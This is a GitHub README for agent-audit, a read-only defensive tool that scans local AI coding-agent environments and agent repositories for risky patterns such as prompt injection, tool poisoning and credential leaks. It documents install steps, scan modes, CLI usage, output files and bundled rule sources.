agent-audit

Forensic auditor for local AI coding agents (Claude Code, Codex CLI, OpenClaw) and project-surface scanner for repos containing skills, plugins, and MCP manifests. Reads session logs, configs, and instruction files, detects known-bad patterns using 296 bundled rules in total, including 167 static-file-applicable rules for scan-project, plus native ASAMM detectors, produces a report, and optionally cross-verifies findings using any combination of installed CLIs, direct API keys, or local LLMs.

agent-audit is one of the implementation projects in the broader ASAMM effort. In ASAMM terms, this repo is the practical measurement and auditing layer: it turns agent-safety patterns into something you can run against real repos, local agent homes, session traces, skill collections, plugin registries, and MCP manifests.

Author

Sergey Gordeychik
[email protected]

Why this project exists

The immediate problem is practical, not purely academic: coding-agent usage is spreading quickly, and incident reports, prompt-injection cases, credential leaks, tool-poisoning patterns, and unsafe autonomy examples are spreading with it. Maintainers need a way to review their own repositories. Users need a way to triage third-party agent repos before installing skills, trusting MCP servers, or reusing workflow instructions. agent-audit exists to make that review automatable and repeatable.

The project is deliberately not "just another signature pack". It is a runner, normalizer, and post-analysis layer around multiple detector families, with extra native logic for agent-specific control gaps that generic scanners usually miss.

Modes at a glance

Mode	Input	Output	Best for
`scan`	Local agent home, configs, hooks, session logs	Verified-first forensic report bundle	Incident review, local environment audit, suspicious agent runs
`scan-project`	One repo or a corpus of repos with instruction surfaces	Project findings, clustered findings, security profile, collection-scale patterns	Pre-release repo audit, third-party repo triage, corpus research

How it works

In both modes, the pipeline is short and predictable:

Discover inputs: find agent homes, session traces, or instruction surfaces such as skills, manifests, and config files.
Apply detectors: run native ASAMM logic plus imported rule packs only where they fit the detected surface.
Normalize and group: deduplicate overlapping rule hits into artifact-backed issue instances and optionally collapse repeated patterns into collection-scale aggregates.
Write review artifacts: emit reports, sidecars, security profiles, and optional verifier-backed follow-up outputs.

flowchart LR
    A["Inputs<br/>agent homes / logs / repos / skills / manifests"] --> B["Surface discovery<br/>& parsing"]
    B --> C["Native + imported detectors"]
    C --> D["Normalization<br/>clustering / aggregation / severity mapping"]
    D --> E["Outputs<br/>reports / sidecars / security profile / verification"]

Install

git clone [email protected]:scadastrangelove/agent-audit.git
cd agent-audit

python3 -m venv .venv
source .venv/bin/activate
pip install -e .

Sanity check:

agent-audit --help
agent-audit packs

How to use

agent-audit has two main operating modes.

Mode 1: forensic audit of a local agent environment

Use this when you want to inspect a local agent home, session logs, config, hooks, and traces for known-bad behavior.

Typical cases:

review a Claude Code or Codex environment after a suspicious run
inspect whether an agent wrote dangerous config, touched secrets, or drifted into unsafe autonomy
generate a verified incident-style report bundle

Examples:

# Auto-discover local agent homes and prompt for consent before reading
agent-audit scan

# Write a full report bundle
agent-audit scan --output ./reports/forensic-run -y

# Ask for verifier review as part of the scan
agent-audit scan --output ./reports/forensic-run --verify -y

# Show available detector packs / bundled rules
agent-audit packs
agent-audit packs --all

What you get:

raw findings from logs, configs, and instruction files
verified-first report bundles for review and sharing
optional config patch suggestions
optional verifier re-checks using configured LLM backends

Mode 2: project / repository surface scan

Use this when you want to audit repos containing SKILL.md, AGENTS.md, CLAUDE.md, plugin manifests, MCP manifests, tool descriptions, or similar instruction surfaces.

Typical cases:

audit your own skill repo before release
triage third-party agent repos before reuse
scan a large corpus of repos for research, benchmarking, or regression tracking

Examples:

# Scan one repo
agent-audit scan-project ~/code/my-agent-repo

# Scan a directory of repos and write output artifacts
agent-audit scan-project ~/code/corpus --output ./reports/project-scan -y

# Focus on one imported pack
agent-audit scan-project ~/code/corpus --tool atr
agent-audit scan-project ~/code/corpus --tool cisco-promptguard

# Reduce noise and keep only stronger findings
agent-audit scan-project ~/code/corpus --min-severity high

# See every repeated finding individually instead of collection-scale rollup
agent-audit scan-project ~/code/corpus --no-aggregate

What you get:

project-findings.json and project-findings.md
clustered-findings.json
security-profile.json
files-of-concern.json
report-profiles.json
collection-scale aggregation for repeated skill/template patterns

Example output directory from scan-project --output ./reports/project-scan:

reports/project-scan/
  project-findings.json
  project-findings.md
  clustered-findings.json
  security-profile.json
  files-of-concern.json
  report-profiles.json

Typical workflow

For maintainers:

Run scan-project on your repository before publishing.
Review project-findings.md and security-profile.json.
Fix or narrow the broadest instruction surfaces first.
Re-run with --min-severity high for a tighter release gate.

For users evaluating third-party repos:

Run scan-project on the repo or corpus you plan to reuse.
Look first at clustered findings and collection-scale patterns.
Treat broad external action, autonomy loops, and trust-boundary expansion findings as review priorities.
If the repo looks suspicious, follow with scan on the actual local agent environment after installation/use.

For research / corpora:

Scan a directory of repos with scan-project.
Keep raw, clustered, and aggregate outputs separate.
Use corpus-lab for regression snapshots and stability checks.

Signature sources

agent-audit currently combines:

Native ASAMM detectors for agent-specific structural gaps such as broad external action without approval, autonomous loops with writes, and persistent identity rewrite.
ATR (Agent Threat Rules) for prompt injection, agent manipulation, excessive autonomy, skill compromise, tool poisoning, context exfiltration, and related agent-centric attack patterns.
Aguara-derived rules for external download/install trust-boundary expansion, third-party content ingestion, SSRF-cloud, and related remote input / remote execution surfaces.
Cisco PromptGuard-style rules for PII harvesting, secret patterns, markdown/data-URI exfiltration, and related prompt/output abuse patterns.

The bundled counts are currently:

233 ATR rules
37 Aguara-derived rules
26 Cisco PromptGuard-derived rules
native ASAMM detectors and project-specific post-processing on top

See THIRD_PARTY_LICENSES.md for provenance and license details.

Why not just run one upstream pack

Using multiple sources matters, but the bigger value is what agent-audit does around them:

Surface-aware application. scan-project does not blindly regex every file. It classifies instruction surfaces such as SKILL.md, AGENTS.md, plugin manifests, MCP manifests, tool descriptions, and task YAMLs, then applies only the relevant rules.
Field-aware filtering. Rules meant for live session events are not blindly reused on flat repo text. This removes a large false-positive class that appears when session-oriented packs are applied out of context.
Native agent-specific logic. Some important problems are absence-based or structural, not just lexical. "Broad action without approval" and "persistent identity rewrite" are examples where native detectors add signal that raw imported signatures do not provide well.
Canonical clustering and deduplication. Different packs often describe different facets of the same dangerous surface. agent-audit clusters raw rule hits into artifact-backed issue instances instead of treating every firing as a separate security fact.
Collection-scale aggregation. When one replicated skill template fires hundreds of times, the tool can collapse that into a collection-scale pattern instead of flooding the operator with near-identical findings.
Severity normalization and reporting. Imported severities and native detector outputs are normalized into one reporting layer, then exposed in raw, clustered, and aggregate views.
Optional verification. Findings can be re-checked with external or local LLM backends, which is useful when raw pattern matches are noisy or context-sensitive.

In short: upstream signatures provide ingredients; agent-audit provides the agent-repo-specific execution model, filtering, clustering, and review workflow needed to make those ingredients operational.

No active defense — read-only analysis with consent prompts at every step. Generates ready-to-review config patches, but never applies them.

See ROADMAP.md for what's coming. See docs/architecture.md for the technical architecture — pipeline stages, module layout, how to add detectors/ surfaces/rules. Start here if you're picking up the project. See docs/ast-precision-plan.md for the staged AST / tree-sitter / Rego adoption plan (v0.12 → v1.0).

Release History

See CHANGELOG.md for current release notes and docs/HISTORICAL_CHANGELOG.md for detailed research-phase iteration history.

Name		Name	Last commit message	Last commit date
Latest commit History 12 Commits
.github/workflows		.github/workflows
benchmarks		benchmarks
docs		docs
src/agent_audit		src/agent_audit
tests		tests
.gitignore		.gitignore
CHANGELOG.md		CHANGELOG.md
CONTRIBUTING.md		CONTRIBUTING.md
EDR_BACKLOG.md		EDR_BACKLOG.md
LICENSE		LICENSE
README.md		README.md
ROADMAP.md		ROADMAP.md
SECURITY.md		SECURITY.md
THIRD_PARTY_LICENSES.md		THIRD_PARTY_LICENSES.md
pyproject.toml		pyproject.toml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

agent-audit

Author

Why this project exists

Modes at a glance

How it works

Install

How to use

Mode 1: forensic audit of a local agent environment

Mode 2: project / repository surface scan

Typical workflow

Signature sources

Why not just run one upstream pack

Release History

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

agent-audit

Author

Why this project exists

Modes at a glance

How it works

Install

How to use

Mode 1: forensic audit of a local agent environment

Mode 2: project / repository surface scan

Typical workflow

Signature sources

Why not just run one upstream pack

Release History

About

Resources

License

Contributing

Security policy

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages